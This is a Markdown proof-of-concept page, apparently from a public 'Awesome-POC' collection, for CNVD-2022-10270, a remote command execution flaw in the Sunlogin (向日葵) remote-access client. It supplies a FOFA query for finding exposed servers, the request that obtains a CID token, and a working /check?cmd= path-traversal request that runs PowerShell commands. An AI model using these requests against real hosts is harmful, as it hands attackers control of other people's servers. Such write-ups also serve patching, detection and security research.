Awesome-POC/服务器应用漏洞/向日葵 check 远程命令执行漏洞 CNVD-2022-10270.md
2022-12-05 11:09:28 +08:00

39 lines
816 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# 向日葵 check 远程命令执行漏洞 CNVD-2022-10270
## 漏洞描述
向日葵通过发送特定的请求获取CID后可调用 check接口实现远程命令执行导致服务器权限被获取
## 漏洞影响
```
11.0.0.33162
```
## FOFA
```
body="Verification failure"
```
## 漏洞复现
向日葵在开启后会默认在 40000-65535 之间开启某端口
![image-20220524135408561](./images/202205241354598.png)
发送请求获取CID
```
/cgi-bin/rpc?action=verify-haras
```
![image-20220524135428094](./images/202205241354132.png)
使用获取到的 verify_string 作为 cookie的 CID字段进行命令执行
```
/check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+ipconfig
```
![](./images/202205241354108.png)